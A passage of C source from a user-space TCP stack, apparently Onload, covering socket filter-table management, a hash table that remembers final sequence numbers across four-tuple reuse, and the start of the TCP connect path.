  if( mode & (CITP_SCALABLE_MODE_TPROXY_ACTIVE | CITP_SCALABLE_MODE_ACTIVE) ) {
    /* TPROXY sockets don't get associated with a hw filter, so don't need
     * oof management. */
    use_mac_filter |= (s->s_flags & CI_SOCK_FLAGS_SCALABLE);
  }

  if( ! use_mac_filter && (mode & CITP_SCALABLE_MODE_PASSIVE) ) {
    /* Passively opened sockets accepted from a listener using a MAC filter
     * also use the MAC filter. */
    use_mac_filter |= OO_SP_NOT_NULL(from_tcp_id) &&
                      (SP_TO_SOCK(ni, from_tcp_id)->s_flags &
                       CI_SOCK_FLAG_STACK_FILTER);
    if( (use_mac_filter == 0) && (s->b.state == CI_TCP_LISTEN) &&
        ci_tcp_use_mac_filter_listen(ni, s, ifindex) )
      use_mac_filter = 1;
  }

  if( use_mac_filter ) {
    /* Only TCP sockets support use of MAC filters at the moment */
    ci_assert_flags(s->b.state, CI_TCP_STATE_TCP);
  }

  return use_mac_filter;
}


#ifndef __KERNEL__
/* Can the stack filter for this scalable socket be installed from user
 * level (as opposed to via the driver)?  Returns non-zero (true) if so. */
int ci_tcp_can_set_filter_in_ul(ci_netif *ni, ci_sock_cmn* s)
{
  if( (s->s_flags & CI_SOCK_FLAGS_SCALABLE) == 0 )
    return 0;
  if( s->b.state == CI_TCP_LISTEN )
    return 0;
  if( (s->s_flags & CI_SOCK_FLAG_REUSEPORT) != 0 )
    return 0;
  if( (s->s_flags & CI_SOCK_FLAG_SCALPASSIVE) != 0 &&
      NI_OPTS(ni).scalable_listen != CITP_SCALABLE_LISTEN_ACCELERATED_ONLY )
    return 0;

  ci_assert_nflags(s->s_flags, CI_SOCK_FLAG_FILTER);
  ci_assert_flags(s->b.state, CI_TCP_STATE_TCP);
  ci_assert_nequal(s->b.state, CI_TCP_LISTEN);
  ci_assert(!CI_IPX_ADDR_IS_ANY(sock_ipx_laddr(s)));
  ci_assert_nequal(sock_lport_be16(s), 0);
  return 1;
}
#endif


/* Insert socket [s] into the stack's software filter table.
 * Returns 0 on success or -EADDRINUSE if the 4-tuple is already taken. */
int ci_tcp_sock_set_stack_filter(ci_netif *ni, ci_sock_cmn* s)
{
  int rc;
  oo_sp sock;

  LOG_TC(log( NSS_FMT " %s", NSS_PRI_ARGS(ni, s), __FUNCTION__));
  ci_assert((s->s_flags & CI_SOCK_FLAG_STACK_FILTER) == 0);
  /* Refuse to install a duplicate of an existing filter entry. */
  sock = ci_netif_filter_lookup(ni, sock_af_space(s), sock_ipx_laddr(s),
                                sock_lport_be16(s), sock_ipx_raddr(s),
                                sock_rport_be16(s), sock_protocol(s));
  if( OO_SP_NOT_NULL(sock) )
    return -EADDRINUSE;

  rc = ci_netif_filter_insert(ni, SC_ID(s), sock_af_space(s),
                              sock_ipx_laddr(s), sock_lport_be16(s),
                              sock_ipx_raddr(s), sock_rport_be16(s),
                              sock_protocol(s));
  if( rc == 0 ) {
    s->s_flags |= CI_SOCK_FLAG_STACK_FILTER;
    if( (s->s_flags & CI_SOCK_FLAGS_SCALABLE) != 0 )
      CITP_STATS_NETIF_INC(ni, mac_filter_shares);
  }
  return rc;
}


/* Remove socket [ts] from the stack's software filter table and clear the
 * corresponding flag. */
void ci_tcp_sock_clear_stack_filter(ci_netif *ni, ci_tcp_state* ts)
{
  LOG_TC(log( LNT_FMT " %s", LNT_PRI_ARGS(ni, ts), __FUNCTION__));
  ci_assert((ts->s.s_flags & CI_SOCK_FLAG_STACK_FILTER) != 0);
  ci_netif_filter_remove(ni, S_ID(ts), sock_af_space(&ts->s),
                         tcp_ipx_laddr(ts), tcp_lport_be16(ts),
                         tcp_ipx_raddr(ts), tcp_rport_be16(ts),
                         tcp_protocol(ts));
  ts->s.s_flags &= ~CI_SOCK_FLAG_STACK_FILTER;
}


/* Returns true if [a] is older than (i.e. was last used before) [b].
*/
ci_inline int /*bool*/
ci_tcp_prev_seq_older(const ci_tcp_prev_seq_t* a, const ci_tcp_prev_seq_t* b)
{
  return ci_ip_time_before(a->expiry, b->expiry);
}


/* Clock-based ISN that would be generated right now for the entry's
 * four-tuple. */
ci_inline ci_uint32
ci_tcp_prev_seq_initial_seqno(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq)
{
  return ci_tcp_initial_seqno(ni, prev_seq->laddr, prev_seq->lport,
                              prev_seq->raddr, prev_seq->rport);
}


/* Clock-based ISN that would be generated for the entry's four-tuple
 * [ticks] ticks in the future. */
ci_inline ci_uint32
ci_tcp_prev_seq_future_isn(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq,
                           ci_iptime_t ticks)
{
  return ci_tcp_future_isn(ni, prev_seq->laddr, prev_seq->lport,
                           prev_seq->raddr, prev_seq->rport, ticks);
}


/* Primary hash of the four-tuple.  The first argument is the index mask:
 * seq_table_entries_n is evidently a power of two (the probe code masks
 * with seq_table_entries_n - 1). */
ci_inline ci_uint32
ci_tcp_prev_seq_hash1(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq)
{
  return onload_hash1(ni->state->seq_table_entries_n - 1,
                      prev_seq->laddr, prev_seq->lport,
                      prev_seq->raddr, prev_seq->rport, IPPROTO_TCP);
}


/* Secondary hash, used as the step in double-hash probing. */
ci_inline ci_uint32
ci_tcp_prev_seq_hash2(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq)
{
  return onload_hash2(prev_seq->laddr, prev_seq->lport,
                      prev_seq->raddr, prev_seq->rport, IPPROTO_TCP);
}


/* Given [prev_seq], which records the last sequence number used by a
 * four-tuple, return whether it would be safe to use the clock-based ISN for
 * a reuse of that four-tuple at all times from now until the peer is
 * guaranteed to have exited TIME_WAIT. */
ci_inline int /*bool*/
ci_tcp_clock_isn_safe(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq)
{
  ci_uint32 isn_now = ci_tcp_prev_seq_initial_seqno(ni, prev_seq);
  ci_uint32 prev_seq_no = prev_seq->seq_no;
  /* We assume that all peers have 2 MSL <= 240 s.  The argument to this
   * function is in ticks, but a tick is between one and two milliseconds.
   */
  ci_uint32 isn_after_2msl = ci_tcp_prev_seq_future_isn
    (ni, prev_seq, NI_CONF(ni).tconst_peer2msl_time);
  /* Safe iff both the current and the 2MSL-future clock ISN are already
   * strictly beyond the last sequence number used on this tuple. */
  return SEQ_GT(isn_now, prev_seq_no) && SEQ_GT(isn_after_2msl, prev_seq_no);
}


/* Fill a prev_seq record from closing socket [ts]: the four-tuple plus the
 * final sequence number offset by EF_TCP_ISN_OFFSET.  seq_no of zero is
 * remapped to 1 -- presumably because 0 is the "nothing remembered" value
 * returned by lookup (see ci_tcp_prev_seq_lookup). */
ci_inline void ci_tcp_prev_seq_from_ts(ci_netif* ni, const ci_tcp_state* ts,
                                       ci_tcp_prev_seq_t* prev_seq /* out */)
{
  prev_seq->laddr = tcp_ipx_laddr(ts);
  prev_seq->raddr = tcp_ipx_raddr(ts);
  prev_seq->lport = tcp_lport_be16(ts);
  prev_seq->rport = tcp_rport_be16(ts);
  prev_seq->seq_no = tcp_enq_nxt(ts) + NI_OPTS(ni).tcp_isn_offset;
  if( prev_seq->seq_no == 0 )
    prev_seq->seq_no = 1;
}


/* Insert [prev_seq_from] (copy 4-tuple and seq_no)
 * into the table at location [prev_seq].  Sets the entry's expiry to
 * now + 2MSL, shortened if the clock-based ISN will overtake seq_no
 * sooner than that. */
ci_inline void
ci_tcp_prev_seq_remember_at(ci_netif* ni,
                            const ci_tcp_prev_seq_t* prev_seq_from,
                            ci_tcp_prev_seq_t* prev_seq)
{
  ci_uint32 isn_now;
  prev_seq->laddr = prev_seq_from->laddr;
  prev_seq->raddr = prev_seq_from->raddr;
  prev_seq->lport = prev_seq_from->lport;
  prev_seq->rport = prev_seq_from->rport;
  prev_seq->seq_no = prev_seq_from->seq_no;
  prev_seq->expiry = ci_tcp_time_now(ni) + NI_CONF(ni).tconst_peer2msl_time;
  /* In many cases clock based ISN catches with entry's seq_no sooner
   * then nominal expiry time.  Once this happen clock based ISN would be
   * good to use and the entry will no longer be needed */

  /*
     \/ now                    \/ after_2msl(=4mins)
  isnclock <------------------------9minutes----------------------->

     /\ after_2msl-0x80000000        /\ now-0x80000000

     possible seq_no locations, where Xs mark the no-go areas:

     XXXX|              XXXXXXXXXXXXXXXXXXXXXXXX
       good: new connection created at any time between 'now' and
       after_2msl will be in the future

     X|              XXXXXXXXXXXXXXXXXXXXXXXXXXX
       bad: peer might still be in time_wait after the wrap point,
       cannot expire before after_2msl

     XXXXXXXXXXXXX              XXXXXXXXXXXXXX|
       bad: mustn't expire until isnclock catches up to here (i.e. in
       about 30 seconds)

     XXXXXXXXXXXXXXXXXXXXXXXXXXXX|
       bad: similar to previous case, but can expire at after_2msl

     XXXXXXXXXXXXXXXXXXXXXXXXXXXX|
       bad: same as case 2
   */
  isn_now = ci_tcp_initial_seqno(ni, prev_seq->laddr, prev_seq->lport,
                                 prev_seq->raddr, prev_seq->rport);
  if( SEQ_GT(prev_seq->seq_no, isn_now) ) {
    ci_uint32 isn_after_2msl = ci_tcp_future_isn
      (ni, prev_seq->laddr, prev_seq->lport,
       prev_seq->raddr, prev_seq->rport,
       NI_CONF(ni).tconst_peer2msl_time);
    if( SEQ_GT(isn_after_2msl, prev_seq->seq_no) ) {
      /* The clock based ISN will catch up with entry between 0 and 2msl.
       * Let's calculate exactly how much earlier this will happen
       * and adjust expiry time accordingly */
      ci_iptime_t expiry_reduce = ci_tcp_isn2tick
        (ni, isn_after_2msl - prev_seq->seq_no);
      ci_assert_ge(NI_CONF(ni).tconst_peer2msl_time, expiry_reduce);
      prev_seq->expiry -= expiry_reduce;
      ni->state->stats.tcp_seq_table_short_expiry++;
    }
  }
  ni->state->stats.tcp_seq_table_insertions++;
}


/* Maximum double-hash probe depth in the prev-seq table. */
#define TCP_PREV_SEQ_DEPTH_LIMIT        16


/* Function removes route_count indexes along the look-up path.
 * [prev_seq_val] is used to generate hashes,
 * [prev_seq_entry] is pointer to the hash table entry, we'd got match with
 * [prev_seq_val] 4 tuple.
*/
static void __ci_tcp_prev_seq_free(ci_netif* ni,
                                   const ci_tcp_prev_seq_t* prev_seq_val,
                                   const ci_tcp_prev_seq_t* prev_seq_entry)
{
  unsigned hash;
  unsigned hash2 = 0;
  int depth = 0;

  hash = ci_tcp_prev_seq_hash1(ni, prev_seq_val);

  /* Walk the same double-hash probe sequence that insertion used,
   * decrementing each entry's route_count, until we hit the target entry. */
  do {
    ci_tcp_prev_seq_t* prev_seq = &ni->seq_table[hash];
    ci_assert_lt(hash, ni->state->seq_table_entries_n);
    ci_assert_gt(prev_seq->route_count, 0);
    --prev_seq->route_count;
    if( prev_seq == prev_seq_entry )
      return;
    if( hash2 == 0 )
      hash2 = ci_tcp_prev_seq_hash2(ni, prev_seq_val);
    hash = (hash + hash2) & (ni->state->seq_table_entries_n - 1);
    depth++;
    ci_assert_le(depth, TCP_PREV_SEQ_DEPTH_LIMIT);
    if(CI_UNLIKELY( depth > TCP_PREV_SEQ_DEPTH_LIMIT )) {
      /* Should be unreachable: the entry was inserted within the depth
       * limit.  Bail out rather than loop forever. */
      LOG_U(ci_log("%s: reached search depth", __FUNCTION__));
      break;
    }
  } while( 1 );
}


/* Free [prev_seq]: drop the route_counts along its probe path and mark the
 * entry unused (laddr == addr_any). */
static void ci_tcp_prev_seq_free(ci_netif* ni, ci_tcp_prev_seq_t* prev_seq)
{
  __ci_tcp_prev_seq_free(ni, prev_seq, prev_seq);
  prev_seq->laddr = addr_any;
}


/* Add the final sequence number of [ts] to a hash table so that, when reusing
 * the four-tuple, we can avoid using sequence numbers that overlap with the
 * old connection.  Some peers are more tolerant than others of such apparent
 * overlap -- Linux, for example, will consider TCP timestamps -- but we have
 * to target the lowest common denominator, as it were, meaning that we can't
 * avoid tracking the sequence number in such cases.
 * Returns non-zero iff an entry was recorded. */
static int /*bool*/
__ci_tcp_prev_seq_remember(ci_netif* ni, const ci_tcp_prev_seq_t* ts_prev_seq)
{
  unsigned hash;
  unsigned hash2 = 0;
  /* Oldest amongst the entries that we've traversed. */
  ci_tcp_prev_seq_t* oldest_seq = NULL;
  ci_tcp_prev_seq_t* prev_seq;
  int depth;

  /* If the clock ISN is safe, no need to remember the sequence number.
   */
  if( ci_tcp_clock_isn_safe(ni, ts_prev_seq) ) {
    ni->state->stats.tcp_seq_table_avoided++;
    return 0;
  }

  hash = ci_tcp_prev_seq_hash1(ni, ts_prev_seq);

  for( depth = 0; depth < TCP_PREV_SEQ_DEPTH_LIMIT; ++depth ) {
    prev_seq = &ni->seq_table[hash];
    ci_assert_lt(hash, ni->state->seq_table_entries_n);
    ci_assert_impl(CI_TCP_PREV_SEQ_IS_TERMINAL(*prev_seq),
                   CI_TCP_PREV_SEQ_IS_FREE(*prev_seq));
    /* Every entry on the probe path counts one more route through it; this
     * is what __ci_tcp_prev_seq_free() unwinds. */
    ++prev_seq->route_count;
    ni->state->stats.tcp_seq_table_steps++;
    if( CI_TCP_PREV_SEQ_IS_FREE(*prev_seq) ) {
      /* Free entry.  Use it. */
      ci_tcp_prev_seq_remember_at(ni, ts_prev_seq, prev_seq);
      break;
    }
    else if( ci_ip_time_before(prev_seq->expiry, ci_ip_time_now(ni)) ) {
      /* Expired entry.  Free it and reuse it. */
      ci_tcp_prev_seq_free(ni, prev_seq);
      ci_tcp_prev_seq_remember_at(ni, ts_prev_seq, prev_seq);
      ni->state->stats.tcp_seq_table_expiries++;
      break;
    }
    else if( depth == 0 || ci_tcp_prev_seq_older(prev_seq, oldest_seq) ) {
      /* Entry is live and in use, and the oldest that we've seen so far.
       * Remember it so that we can purge the oldest if we don't find any free
       * or expired entries. */
      oldest_seq = prev_seq;
    }
    if( hash2 == 0 )
      hash2 = ci_tcp_prev_seq_hash2(ni, ts_prev_seq);
    hash = (hash + hash2) & (ni->state->seq_table_entries_n - 1);
  }

  /* If we didn't find any free entries, use the oldest up to the search
   * depth.
   */
  if( depth >= TCP_PREV_SEQ_DEPTH_LIMIT ) {
    ci_assert_equal(depth, TCP_PREV_SEQ_DEPTH_LIMIT);
    ci_assert(oldest_seq);
    /* rollback all route count updates we made above */
    __ci_tcp_prev_seq_free(ni, ts_prev_seq, prev_seq);
    /* purge the oldest entry */
    ci_tcp_prev_seq_free(ni, oldest_seq);
    ni->state->stats.tcp_seq_table_purgations++;
    /* redo insertion, now it will succeed with free entry */
    __ci_tcp_prev_seq_remember(ni, ts_prev_seq);
  }

  return 1;
}


/* Probe the table for an entry matching [ts_prev_seq]'s four-tuple.
 * Returns the entry, or NULL if not present within the depth limit. */
static ci_tcp_prev_seq_t*
__ci_tcp_prev_seq_lookup(ci_netif* ni, const ci_tcp_prev_seq_t* ts_prev_seq)
{
  unsigned hash = ci_tcp_prev_seq_hash1(ni, ts_prev_seq);
  unsigned hash2 = 0;
  int depth;

  for( depth = 0; depth < TCP_PREV_SEQ_DEPTH_LIMIT; ++depth ) {
    ci_tcp_prev_seq_t* prev_seq = &ni->seq_table[hash];
    ci_assert_lt(hash, ni->state->seq_table_entries_n);
    if( CI_TCP_PREV_SEQ_IS_TERMINAL(*prev_seq) ) {
      /* No probe path passes through this free entry, so the tuple cannot
       * be further along the chain. */
      return NULL;
    }
    if( CI_IPX_ADDR_EQ(prev_seq->laddr, ts_prev_seq->laddr) &&
        prev_seq->lport == ts_prev_seq->lport &&
        CI_IPX_ADDR_EQ(prev_seq->raddr, ts_prev_seq->raddr) &&
        prev_seq->rport == ts_prev_seq->rport )
      return prev_seq;
    if( hash2 == 0 )
      hash2 = ci_tcp_prev_seq_hash2(ni, ts_prev_seq);
    hash = (hash + hash2) & (ni->state->seq_table_entries_n - 1);
  }
  return NULL;
}


/* Look up (and consume) the remembered final sequence number for [ts]'s
 * four-tuple.  Returns the remembered seq_no, or 0 if none.  On a hit the
 * table entry is freed -- each remembered value is used at most once. */
ci_uint32 ci_tcp_prev_seq_lookup(ci_netif* ni, const ci_tcp_state* ts)
{
  ci_tcp_prev_seq_t ts_prev_seq;
  ci_tcp_prev_seq_t* prev_seq;
  ci_uint32 seq_no;

  ci_tcp_prev_seq_from_ts(ni, ts, &ts_prev_seq);
  prev_seq = __ci_tcp_prev_seq_lookup(ni, &ts_prev_seq);
  if( prev_seq == NULL )
    return 0;
  seq_no = prev_seq->seq_no;
  ci_tcp_prev_seq_free(ni, prev_seq);
  ni->state->stats.tcp_seq_table_hits++;
  return seq_no;
}


/* Record [ts]'s final sequence number when the socket closes, so that a
 * later reuse of the four-tuple can pick a non-overlapping ISN.  No-op
 * unless EF_TCP_ISN mode 1 is enabled; passively-opened sockets are skipped
 * unless tcp_isn_include_passive is set. */
void ci_tcp_prev_seq_remember(ci_netif* ni, ci_tcp_state* ts)
{
  ci_tcp_prev_seq_t ts_prev_seq;

  if( NI_OPTS(ni).tcp_isn_mode != 1 )
    return;
  if( ! NI_OPTS(ni).tcp_isn_include_passive &&
      ts->tcpflags & CI_TCPT_FLAG_PASSIVE_OPENED )
    return;
  /* We record the final sequence number, so we must have sent a FIN.  If the
   * peer is not in TIME_WAIT, then we don't need to bother remembering the
   * sequence number.  As such, we should call this function precisely when
   * entering LAST_ACK or CLOSING. */
  if( ts->s.b.state != CI_TCP_CLOSING )
    ci_assert_equal(ts->s.b.state, CI_TCP_LAST_ACK);

  ci_tcp_prev_seq_from_ts(ni, ts, &ts_prev_seq);
  if( __ci_tcp_prev_seq_remember(ni, &ts_prev_seq) )
    ts->tcpflags |= CI_TCPT_FLAG_SEQNO_REMEMBERED;
}


/* Linux clears implicit address on connect failure */
ci_inline void ci_tcp_connect_drop_implicit_address(ci_tcp_state *ts)
{
  if( ! (ts->s.cp.sock_cp_flags & OO_SCP_BOUND_ADDR) ) {
#if CI_CFG_IPV6
    if( ts->s.domain == AF_INET6 )
      ts->s.cp.laddr = ts->s.laddr = addr_any;
    else
#endif
      ts->s.cp.laddr = ts->s.laddr = ip4_addr_any;
  }
}


/* Return codes from ci_tcp_connect_ul_start(). */
#define CI_CONNECT_UL_OK                0
#define CI_CONNECT_UL_FAIL              -1
#define CI_CONNECT_UL_START_AGAIN       -2
#define CI_CONNECT_UL_LOCK_DROPPED      -3
#define CI_CONNECT_UL_ALIEN_BOUND       -4

/* The fd parameter is ignored when this is called in the kernel */
static int ci_tcp_connect_ul_start(ci_netif *ni, ci_tcp_state* ts, ci_fd_t fd,
                                   ci_addr_t dst, unsigned dport_be16,
                                   int* fail_rc)
{
  ci_ip_pkt_fmt* pkt;
  int rc = 0;
  oo_sp active_wild = OO_SP_NULL;
  ci_uint32 prev_seq = 0;
  int added_scalable = 0;
  ci_addr_t saddr;

  ci_assert(ts->s.pkt.mtu);

  ts->tcpflags &=~ CI_TCPT_FLAG_FIN_RECEIVED;

  /* Now that we know the outgoing route, set the MTU related values.
   * Note, even these values are speculative since the real MTU
   * could change between now and passing the packet to the lower layers
   */
  ts->amss = ci_tcp_amss(ni, &ts->c, &ts->s.pkt, __func__);

  /* Default smss until discovered by MSS option in SYN - RFC1122 4.2.2.6 */
  ts->smss = CI_CFG_TCP_DEFAULT_MSS;

  /* set pmtu, eff_mss, snd_buf and adjust windows */
  ci_tcp_set_eff_mss(ni, ts);
  ci_tcp_set_initialcwnd(ni, ts);

  /* Send buffer adjusted by ci_tcp_set_eff_mss(), but we want it to stay
   * zero until the connection is established.
*/ ts->so_sndbuf_pkts = 0; /* Reset ka_probes if it is a second connect after failure. */ ts->ka_probes = 0; /* * 3. State and address are OK. It's address routed through our NIC. * Do connect(). */ ci_assert(!CI_IPX_ADDR_IS_ANY(ipcache_laddr(&ts->s.pkt))); /* socket can only could have gotten scalative on prior * implicit bind */ ci_assert_impl(ts->s.s_flags & CI_SOCK_FLAG_SCALACTIVE, ~ts->s.s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND); if( ts->s.s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND ) { ci_uint16 source_be16 = 0; ci_sock_cmn* s = &ts->s; saddr = sock_ipx_laddr(&ts->s); #ifndef __KERNEL__ active_wild = ci_netif_active_wild_get(ni, sock_ipx_laddr(&ts->s), sock_ipx_raddr(&ts->s), dport_be16, &source_be16, &prev_seq); #endif /* Defer active_wild related state update to after potential lock drops * (pkt wait) */ if( active_wild == OO_SP_NULL ) { if( NI_OPTS(ni).tcp_shared_local_no_fallback ) /* error matching exhaustion of ephemeral ports */ CI_SET_ERROR(rc, EADDRNOTAVAIL); else if( s->cp.sock_cp_flags & OO_SCP_BOUND_ADDR ) rc = __ci_tcp_bind(ni, &ts->s, fd, saddr, &source_be16, 0); else rc = __ci_tcp_bind(ni, &ts->s, fd, addr_any, &source_be16, 0); if(CI_UNLIKELY( rc != 0 )) { LOG_U(ci_log("__ci_tcp_bind returned %d at %s:%d", rc, __FILE__, __LINE__)); *fail_rc = rc; return CI_CONNECT_UL_FAIL; } if(CI_UNLIKELY( CI_IPX_ADDR_IS_ANY(saddr) )) { /* FIXME is this an impossible branch? */ CI_SET_ERROR(*fail_rc, EINVAL); return CI_CONNECT_UL_FAIL; } } /* Commit source port now. 
In case of failure down the lane, an implicit port * might be overwritten by following attempt */ TS_IPX_TCP(ts)->tcp_source_be16 = source_be16; ts->s.cp.lport_be16 = source_be16; LOG_TC(log(LNT_FMT "connect: our bind returned " IPX_PORT_FMT, LNT_PRI_ARGS(ni, ts), IPX_ARG(AF_IP(saddr)), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_source_be16))); } /* In the normal case, we only install filters for IP addresses configured on * acceleratable interfaces, and so if the socket is bound to an alien * address, we can't accelerate it. Using a MAC filter overcomes this * limitation, however. */ if( ~ni->state->flags & CI_NETIF_FLAG_USE_ALIEN_LADDRS && (ts->s.s_flags & CI_SOCK_FLAG_BOUND_ALIEN) && ! (ts->s.pkt.flags & CI_IP_CACHE_IS_LOCALROUTE || ts->s.s_flags & (CI_SOCK_FLAG_TPROXY | CI_SOCK_FLAG_SCALACTIVE)) ) { ci_assert_equal(active_wild, OO_SP_NULL); return CI_CONNECT_UL_ALIEN_BOUND; } /* Commit peer now - these are OK to be overwritten by following attempt */ ci_tcp_set_peer(ts, dst, dport_be16); /* Make sure we can get a buffer before we change state. */ pkt = ci_netif_pkt_tx_tcp_alloc(ni, ts); if( CI_UNLIKELY(! pkt) ) { /* Should we block or return error? */ if( NI_OPTS(ni).tcp_nonblock_no_pkts_mode && (ts->s.b.sb_aflags & (CI_SB_AFLAG_O_NONBLOCK | CI_SB_AFLAG_O_NDELAY)) ) { CI_SET_ERROR(*fail_rc, ENOBUFS); rc = CI_CONNECT_UL_FAIL; goto fail; } /* NB. We've already done a poll above. */ rc = ci_netif_pkt_wait(ni, &ts->s, CI_SLEEP_NETIF_LOCKED|CI_SLEEP_NETIF_RQ); if( ci_netif_pkt_wait_was_interrupted(rc) ) { CI_SET_ERROR(*fail_rc, -rc); rc = CI_CONNECT_UL_LOCK_DROPPED; goto fail; } /* OK, there are (probably) packets available - go try again. Note we * jump back to the top of the function because someone may have * connected this socket in the mean-time, so we need to check the * state once more. 
*/ rc = CI_CONNECT_UL_START_AGAIN; goto fail; } #ifdef ONLOAD_OFE if( ni->ofe_channel != NULL ) ts->s.ofe_code_start = ofe_socktbl_find( ni->ofe, OFE_SOCKTYPE_TCP_ACTIVE, tcp_laddr_be32(ts), tcp_raddr_be32(ts), tcp_lport_be16(ts), tcp_rport_be16(ts)); else ts->s.ofe_code_start = OFE_ADDR_NULL; #endif if( active_wild != OO_SP_NULL && (ts->s.s_flags & CI_SOCK_FLAG_TPROXY) == 0 ) { /* Need to set the flag now for consumption by ci_tcp_ep_set_filters */ ts->s.s_flags |= CI_SOCK_FLAG_SCALACTIVE; added_scalable = 1; } rc = ci_tcp_ep_set_filters(ni, S_SP(ts), ts->s.cp.so_bindtodevice, active_wild); if( rc < 0 ) { /* Perhaps we've run out of filters? See if we can push a socket out * of timewait and steal its filter. */ ci_assert_nequal(rc, -EFILTERSSOME); if( rc != -EBUSY || ! ci_netif_timewait_try_to_free_filter(ni) || (rc = ci_tcp_ep_set_filters(ni, S_SP(ts), ts->s.cp.so_bindtodevice, active_wild)) < 0 ) { ci_assert_nequal(rc, -EFILTERSSOME); /* Either a different error, or our efforts to free a filter did not * work. */ if( added_scalable ) ts->s.s_flags &= ~CI_SOCK_FLAG_SCALACTIVE; /* rollback scalactive flag */ ci_netif_pkt_release(ni, pkt); CI_SET_ERROR(*fail_rc, -rc); rc = CI_CONNECT_UL_FAIL; goto fail; } } /* Point of no failure */ /* Commit active_wild related flags */ if( active_wild != OO_SP_NULL ) { ts->tcpflags |= CI_TCPT_FLAG_ACTIVE_WILD; ts->s.s_flags &= ~(CI_SOCK_FLAG_DEFERRED_BIND | CI_SOCK_FLAG_CONNECT_MUST_BIND); } LOG_TC(log(LNT_FMT "CONNECT " IPX_PORT_FMT "->" IPX_PORT_FMT, LNT_PRI_ARGS(ni, ts), IPX_ARG(AF_IP(ipcache_laddr(&ts->s.pkt))), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_source_be16), IPX_ARG(AF_IP(ipcache_raddr(&ts->s.pkt))), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_dest_be16))); /* We are going to send the SYN - set states appropriately */ /* We test prev_seq in a moment, which is always zero in the kernel, but * that's OK, because this function is only called in the kernel for loopback * connections. 
*/ if( NI_OPTS(ni).tcp_isn_mode == 1 ) { if( prev_seq == 0 ) { prev_seq = ci_tcp_prev_seq_lookup(ni, ts); } else { #ifndef NDEBUG /* If we got a sequence number from TIME_WAIT-reuse, the table should not * have an entry for this four-tuple, as any such entry would now * necessarily be stale. Assert this. Use an intermediate variable to * avoid calling the function more than once. */ ci_uint32 table_seq = ci_tcp_prev_seq_lookup(ni, ts); ci_assert_equal(table_seq, 0); #endif } } if( prev_seq ) /* We're reusing a TIME_WAIT. We do the same as Linux, and choose the new * sequence number a little way from the old. */ tcp_snd_nxt(ts) = prev_seq; else tcp_snd_nxt(ts) = ci_tcp_initial_seqno(ni, tcp_ipx_laddr(ts), TS_IPX_TCP(ts)->tcp_source_be16, tcp_ipx_laddr(ts), TS_IPX_TCP(ts)->tcp_dest_be16); tcp_snd_una(ts) = tcp_enq_nxt(ts) = tcp_snd_up(ts) = tcp_snd_nxt(ts); ts->snd_max = tcp_snd_nxt(ts) + 1; /* Must be after initialising snd_una. */ ci_tcp_clear_rtt_timing(ts); ci_tcp_set_flags(ts, CI_TCP_FLAG_SYN); ts->tcpflags &=~ CI_TCPT_FLAG_OPT_MASK; ts->tcpflags |= NI_OPTS(ni).syn_opts; if( (ts->tcpflags & CI_TCPT_FLAG_WSCL) ) { if( NI_OPTS(ni).tcp_rcvbuf_mode == 1 ) ts->rcv_wscl = ci_tcp_wscl_by_buff(ni, ci_tcp_max_rcvbuf(ni, ts->amss)); else ts->rcv_wscl = ci_tcp_wscl_by_buff(ni, ci_tcp_rcvbuf_established(ni, &ts->s)); CI_IP_SOCK_STATS_VAL_RXWSCL(ts, ts->rcv_wscl); } else { ts->rcv_wscl = 0; CI_IP_SOCK_STATS_VAL_RXWSCL(ts, 0); } ci_tcp_set_rcvbuf(ni, ts); TS_IPX_TCP(ts)->tcp_window_be16 = ci_tcp_calc_rcv_wnd_syn(ts->s.so.rcvbuf, ts->amss, ts->rcv_wscl); tcp_rcv_wnd_right_edge_sent(ts) = tcp_rcv_nxt(ts) + TS_IPX_TCP(ts)->tcp_window_be16; ts->rcv_wnd_advertised = TS_IPX_TCP(ts)->tcp_window_be16; TS_IPX_TCP(ts)->tcp_window_be16 = CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_window_be16); /* outgoing_hdrs_len is initialised to include timestamp option. */ if( ! 
(ts->tcpflags & CI_TCPT_FLAG_TSO) ) ts->outgoing_hdrs_len = CI_IPX_HDR_SIZE(ipcache_af(&ts->s.pkt)) + sizeof(ci_tcp_hdr); if( ci_tcp_can_stripe(ni, ts->s.pkt.ipx.ip4.ip_saddr_be32, ts->s.pkt.ipx.ip4.ip_daddr_be32) ) ts->tcpflags |= CI_TCPT_FLAG_STRIPE; ci_tcp_set_slow_state(ni, ts, CI_TCP_SYN_SENT); /* If the app trys to send data on a socket in SYN_SENT state ** then the data is queued for send until the SYN gets ACKed. ** (rfc793 p56) ** ** Receive calls on the socket should block until data arrives ** (rfc793 p58) ** ** Clearing tx_errno and rx_errno acheive this. The transmit window ** is set to 1 byte which ensures that only the SYN packet gets ** sent until the ACK is received with more window. */ ci_assert(ts->snd_max == tcp_snd_nxt(ts) + 1); ts->s.rx_errno = 0; ts->s.tx_errno = 0; /* If ARP resolution fails, we have to drop the connection, so we store * the socket id in the SYN packet. */ pkt->pf.tcp_tx.sock_id = ts->s.b.bufid; ci_tcp_enqueue_no_data(ts, ni, pkt); ci_tcp_set_flags(ts, CI_TCP_FLAG_ACK); if( ts->s.b.sb_aflags & (CI_SB_AFLAG_O_NONBLOCK | CI_SB_AFLAG_O_NDELAY) ) { ts->tcpflags |= CI_TCPT_FLAG_NONBLOCK_CONNECT; LOG_TC(log( LNT_FMT "Non-blocking connect - return EINPROGRESS", LNT_PRI_ARGS(ni, ts))); CI_SET_ERROR(*fail_rc, EINPROGRESS); /* We don't jump to the "fail" label here, as this is a failure only from * the point of view of the connect() API, and we don't want to tear down * the socket. */ return CI_CONNECT_UL_FAIL; } return CI_CONNECT_UL_OK; fail: ci_tcp_connect_drop_implicit_address(ts); return rc; } ci_inline int ci_tcp_connect_handle_so_error(ci_sock_cmn *s) { ci_int32 rc = ci_get_so_error(s); if( rc == 0 ) return 0; s->rx_errno = ENOTCONN; return rc; } static int ci_tcp_connect_ul_syn_sent(ci_netif *ni, ci_tcp_state *ts) { int rc = 0; if( 